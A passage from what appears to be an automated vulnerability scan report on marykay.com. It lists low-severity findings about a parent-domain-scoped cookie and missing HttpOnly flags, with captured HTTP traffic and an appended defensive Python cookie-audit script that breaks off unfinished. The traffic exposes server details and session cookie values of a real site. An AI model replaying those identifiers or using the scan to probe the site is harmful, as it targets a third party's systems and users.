Set-Cookie: TLTHID=A5B951464DDB4DF25E342EB344BDA973; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:45 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:46 GMT; path=/

var delay = 1000;
var seltab = null;
var prevtab = null;
function tabs_init(id)
{
   seltab = document.getElementById(id);
   showTab(seltab, false);
}
function hideMenu(menu)
{
   if (menu != nul
...[SNIP]...

12.97. http://www.marykay.com/content/HPflash/portfolio_mk.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marykay.com
Path:   /content/HPflash/portfolio_mk.xml

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: TLTHID, set with Domain=.marykay.com (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/HPflash/portfolio_mk.xml HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/content/hpflash/stage.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2733271E851D12D2-600001058002D751[CE]; TLTHID=5BABE8214E2E52E7EF445991E652AAEE; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 316
Content-Type: text/xml
Last-Modified: Wed, 31 Aug 2011 14:47:25 GMT
Accept-Ranges: bytes
ETag: "8bceaae5ec67cc1:d825c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=19C9D0014D75852EFB8C9087C106B6A5; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:52 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:53 GMT; path=/

<?xml version="1.0" ?>
<portfolio>
   <picture thumb    = "/CONTENT/HPflash/Thumbs/tb_eyebundles.jpg"/>
   <picture thumb    = "/CONTENT/HPflash/Thumbs/tb_mascarawardrobe.jpg"/>            
   <picture thumb    = "/CONTE
...[SNIP]...

12.98. http://www.marykay.com/content/hpflash/stage.swf

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marykay.com
Path:   /content/hpflash/stage.swf

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: TLTHID, set with Domain=.marykay.com (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/hpflash/stage.swf HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/default.aspx?pid=mk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=9F32F1D24088FD7A7C1A4C8250D2F93D; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 41607
Content-Type: application/x-shockwave-flash
Last-Modified: Fri, 03 Jun 2011 15:46:18 GMT
Accept-Ranges: bytes
ETag: "a318661522cc1:d8265"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=9326E0864457B586C81FDD8CE24A23E5; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:50 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:51 GMT; path=/

CWS..i..x...wTS..(<IH..1T..@..t.I..$...(J7A......%...    .!tAQ..("(.X "*6., v.
......w....?..u....={f~.M......P..@.....q@OLL..-F.>.......:.....`=3j.[X.....8`.)..`o4j.X.....e.^....".ak.....`....QA...o...
...[SNIP]...

12.99. http://www.marykay.com/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marykay.com
Path:   /default.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: TLTHID, set with Domain=.marykay.com (see the Set-Cookie header in the response below; the other cookies this response sets carry no Domain attribute and are host-only). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /default.aspx?pid=mk HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Direct+Beauty+Product
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Subsidiary=US; TLTHID=DFDB2FDD45BA94FC283A74BD7C3CBF64; TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Tue, 06 Sep 2011 16:45:46 GMT
Content-Type: text/html; charset=utf-8
Content-Language: en
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: Subsidiary=US; path=/
Set-Cookie: PreviousMoniker=; path=/
Set-Cookie: Moniker=; path=/
Set-Cookie: ConsultantContactID=-9223372036854775808; path=/
Set-Cookie: TLTHID=A79DE10345855E54FDA05590CB54614B; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Vary: Accept-Encoding
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:46 GMT; path=/
Content-Length: 36830


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 TRANSITIONAL//EN" >
<html>
<head><meta name="title" content="Mary Kay... Find your way to beautiful!" /><link id="Link1" rel="image_src" href="http://w
...[SNIP]...

12.100. http://www.marykay.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marykay.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: TLTHID, set with Domain=.marykay.com (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2733271E851D12D2-600001058002D751[CE]; TLTHID=921B020F47FD8A57A88269A775E750F4; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 318
Content-Type: image/x-icon
Last-Modified: Wed, 06 Apr 2011 17:12:18 GMT
Accept-Ranges: bytes
ETag: "b9ed3c87df4cb1:d826e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=43433491401355FE92B1C286F65FC316; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:57 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:58 GMT; path=/

..............(.......(....... ....................................3...f...f...........................$...........\......m...wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwEwWtgEwFDu.rw4sWds%bwDDwtBtDwAGwt.
...[SNIP]...

12.101. http://www.marykay.com/images/fflogo.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marykay.com
Path:   /images/fflogo.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: TLTHID (Domain=.marykay.com). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/fflogo.jpg HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/default.aspx?pid=mk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=0CA8F6134F6BF5C078C5DCA0DFE88F3B; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 1665
Content-Type: image/jpeg
Last-Modified: Thu, 02 Jun 2011 09:18:24 GMT
Accept-Ranges: bytes
ETag: "8b6f46621cc1:d826e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=BCE7DC82466E2D42565B29A3B3C4E9C6; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:48 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:49 GMT; path=/

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

............................................................................................................J..
...[SNIP]...

12.102. http://www.marykay.com/images/icn_ec.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marykay.com
Path:   /images/icn_ec.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: TLTHID (Domain=.marykay.com). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/icn_ec.jpg HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/default.aspx?pid=mk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=0CA8F6134F6BF5C078C5DCA0DFE88F3B; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 1712
Content-Type: image/jpeg
Last-Modified: Thu, 02 Jun 2011 09:18:24 GMT
Accept-Ranges: bytes
ETag: "17d0446621cc1:d822e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=242A48734AE8C90326B538806CDF19D0; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:48 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:49 GMT; path=/

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

..........................................................................................................$.Z..
...[SNIP]...

12.103. http://www.marykay.com/images/icn_fb.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marykay.com
Path:   /images/icn_fb.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: TLTHID (Domain=.marykay.com). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/icn_fb.jpg HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/default.aspx?pid=mk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=0CA8F6134F6BF5C078C5DCA0DFE88F3B; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 1769
Content-Type: image/jpeg
Last-Modified: Thu, 02 Jun 2011 09:18:24 GMT
Accept-Ranges: bytes
ETag: "bbc506621cc1:d822e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=8AA5E3834817F20E05D692A6C10BEF9D; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:48 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:49 GMT; path=/

.PNG
.
...IHDR...z...$........4....gAMA......a.....tEXtSoftware.Adobe ImageReadyq.e<...{IDAThC.Z.oTE...mL0!.?@q%.*...    H"./h.W..D..l..}hY.(R............D....1-,&m.~....g......Z......3gf.............
...[SNIP]...

12.104. http://www.marykay.com/images/icn_pbp.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marykay.com
Path:   /images/icn_pbp.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: TLTHID (Domain=.marykay.com). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/icn_pbp.jpg HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/default.aspx?pid=mk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=0CA8F6134F6BF5C078C5DCA0DFE88F3B; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 2351
Content-Type: image/jpeg
Last-Modified: Thu, 02 Jun 2011 09:18:24 GMT
Accept-Ranges: bytes
ETag: "d380556621cc1:d822e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=171587244A3CE521A7BA37AE883107B1; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:49 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:50 GMT; path=/

......JFIF.....`.`.....4Exif..II*.......1...............Adobe ImageReady.....C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!22222222222222222222222222222222222222
...[SNIP]...

12.105. http://www.marykay.com/images/icn_vmo.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marykay.com
Path:   /images/icn_vmo.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: TLTHID (Domain=.marykay.com). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/icn_vmo.jpg HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/default.aspx?pid=mk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=0CA8F6134F6BF5C078C5DCA0DFE88F3B; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 1933
Content-Type: image/jpeg
Last-Modified: Thu, 02 Jun 2011 09:18:24 GMT
Accept-Ranges: bytes
ETag: "8f31666621cc1:d822e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=1DB2B50F43E3F4D03BDF68AE8CA2AE7C; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:49 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:50 GMT; path=/

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

..........................................................................................................$....
...[SNIP]...

12.106. http://www.marykay.com/images/icn_yt.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marykay.com
Path:   /images/icn_yt.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: TLTHID (Domain=.marykay.com). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/icn_yt.jpg HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/default.aspx?pid=mk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=0CA8F6134F6BF5C078C5DCA0DFE88F3B; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 3367
Content-Type: image/jpeg
Last-Modified: Thu, 02 Jun 2011 09:18:24 GMT
Accept-Ranges: bytes
ETag: "7797e6621cc1:d822e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=34430B6646F0AFCCDB0A7A9022E2E592; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:48 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:49 GMT; path=/

.PNG
.
...IHDR.......$.....%..g....gAMA......a.....tEXtSoftware.Adobe ImageReadyq.e<....IDAThC.ZyPU..O.n..E.Z.4...Z..2j..L HQ.L.&...d...hTp#U.......S.4..`*..Z1.7.....Ux..... ..=..}..<.F.=s..s.=....
...[SNIP]...

12.107. http://www.marykay.com/images/ielogo.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marykay.com
Path:   /images/ielogo.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: TLTHID (Domain=.marykay.com). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/ielogo.jpg HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/default.aspx?pid=mk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=0CA8F6134F6BF5C078C5DCA0DFE88F3B; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 1740
Content-Type: image/jpeg
Last-Modified: Thu, 02 Jun 2011 09:18:25 GMT
Accept-Ranges: bytes
ETag: "cf578c6621cc1:d826e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=228F4B284CAFE25E42ECD3B80A8FB732; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:47 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:47 GMT; path=/

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

............................................................................................................J..
...[SNIP]...

12.108. http://www.marykay.com/images/searchbutton.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marykay.com
Path:   /images/searchbutton.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: TLTHID (Domain=.marykay.com). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/searchbutton.gif HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/default.aspx?pid=mk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=0CA8F6134F6BF5C078C5DCA0DFE88F3B; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 239
Content-Type: image/gif
Last-Modified: Wed, 06 Apr 2011 17:12:22 GMT
Accept-Ranges: bytes
ETag: "99f3fcca7df4cb1:d822e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=F0C410BF4DA1CA468842AA86BA246468; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:47 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:47 GMT; path=/

GIF89a......~OL~PN|ON...?++...............C.-@++B,,@,+~PL......|OL.ON.PO~ON....PN...........................!.......,.........l.d.V9.V...9...`t]...co..%Z.q..^4...1.|.....Mh.)...d.    .T:m.(.,.|.$.l.$..
...[SNIP]...

12.109. http://www.marykay.com/scripts/i2a.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marykay.com
Path:   /scripts/i2a.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: TLTHID (Domain=.marykay.com). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /scripts/i2a.js HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/default.aspx?pid=mk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=BEE60304423925D85D6C08B50AA3F8E6; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 1848
Content-Type: application/x-javascript
Last-Modified: Wed, 06 Apr 2011 17:12:25 GMT
Accept-Ranges: bytes
ETag: "80e28bcc7df4cb1:d826e"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=F487BB6C456B8904C272E490A0B8A392; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:47 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:47 GMT; path=/

var io = new Image();
var pageAction, price, sku, order_code, currency_id, user_defined1, user_defined2, user_defined3, user_defined4, ic_cat, ic_bu, ic_bc, ic_ch, ic_nso, altid, ic_type, urlA, prefi
...[SNIP]...

13. Cookie without HttpOnly flag set
There are 262 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript (the document.cookie API does not expose it). This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-Cookie header.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances (for example, by cross-site tracing where the server still answers TRACE requests, or through browser bugs), and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.
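The two cookie checks this report applies, a Domain attribute scoped to a parent of the issuing host (Issue 12) and a missing HttpOnly flag (Issue 13), are simple enough to script against a proxy's saved responses. The Python below is an added example written for this page; it is not code from the XSS.CX report or from the scanner that produced it. It parses Set-Cookie headers out of raw responses, applies both checks and, going one step beyond the report, a Secure-flag check for responses served over HTTPS, rates a cookie as a session token by name (the list of names and the "contains sess" rule are assumptions made for this example, since the scanner's own heuristic is not published here), and re-emits a hardened header. The two sample responses are header excerpts copied from instances 12.100 and 13.1 of this report, with bodies omitted.

```python
"""Audit Set-Cookie headers in saved HTTP responses for parent-domain scope and missing
HttpOnly/Secure. Added example for this page; not code from the XSS.CX report or Burp Suite."""
import re

# Session-cookie names for platforms that appear in this report (Java servlet containers,
# PHP, ASP.NET). Assumption: chosen for this example; the scanner's heuristic is not published.
KNOWN_SESSION_NAMES = {"JSESSIONID", "PHPSESSID", "ASP.NET_SessionId", "ASPSESSIONID", "CFID", "CFTOKEN"}
CANONICAL_ATTRS = {"path": "Path", "domain": "Domain", "expires": "Expires", "max-age": "Max-Age",
                   "secure": "Secure", "httponly": "HttpOnly", "samesite": "SameSite"}


def parse_set_cookie(header_value):
    """Split one Set-Cookie value into (name, value, attrs); attr keys lower-cased, flags map to ''."""
    first, *rest = [p.strip() for p in header_value.split(";")]
    name, _, value = first.partition("=")
    attrs = {}
    for part in filter(None, rest):
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()
    return name.strip(), value.strip(), attrs


def looks_like_session_token(name):
    """Name-based heuristic: a known platform session cookie, or a name containing 'sess'.
    Deliberately does not flag opaque IDs such as TLTHID, matching the report's verdict."""
    return name in KNOWN_SESSION_NAMES or "sess" in name.lower()


def domain_scope(host, attrs):
    """Classify the Domain attribute relative to the issuing host: 'host-only' (no Domain),
    'exact', 'parent' (the report's Issue 12) or 'foreign' (a browser would reject it)."""
    domain = attrs.get("domain", "").lower().lstrip(".")
    host = host.lower()
    if not domain:
        return "host-only"
    if domain == host:
        return "exact"
    if host.endswith("." + domain):
        return "parent"
    return "foreign"


def set_cookie_headers(raw_response):
    """Return every Set-Cookie value from the header block of a raw HTTP response."""
    head = re.split(r"\r?\n\r?\n", raw_response, maxsplit=1)[0]
    return [m.group(1).strip() for m in re.finditer(r"^set-cookie:[ \t]*(.*)$", head, re.I | re.M)]


def audit_response(host, raw_response, https=False):
    """Run the checks over one captured response. Returns (cookie_name, finding) tuples."""
    findings = []
    for header in set_cookie_headers(raw_response):
        name, _, attrs = parse_set_cookie(header)
        note = " (session token)" if looks_like_session_token(name) else ""
        if "httponly" not in attrs:
            findings.append((name, f"missing HttpOnly{note}"))
        if https and "secure" not in attrs:
            findings.append((name, f"missing Secure on HTTPS response{note}"))
        scope = domain_scope(host, attrs)
        if scope == "parent":
            findings.append((name, f"scoped to parent domain {attrs['domain']}{note}"))
        elif scope == "foreign":
            findings.append((name, f"Domain {attrs['domain']} does not cover {host}; browsers reject it"))
    return findings


def harden_set_cookie(header_value, https=False):
    """Re-emit a Set-Cookie value with HttpOnly (and Secure on HTTPS) added when absent.
    Domain is left as-is: narrowing it is a functional change to review, not a mechanical fix."""
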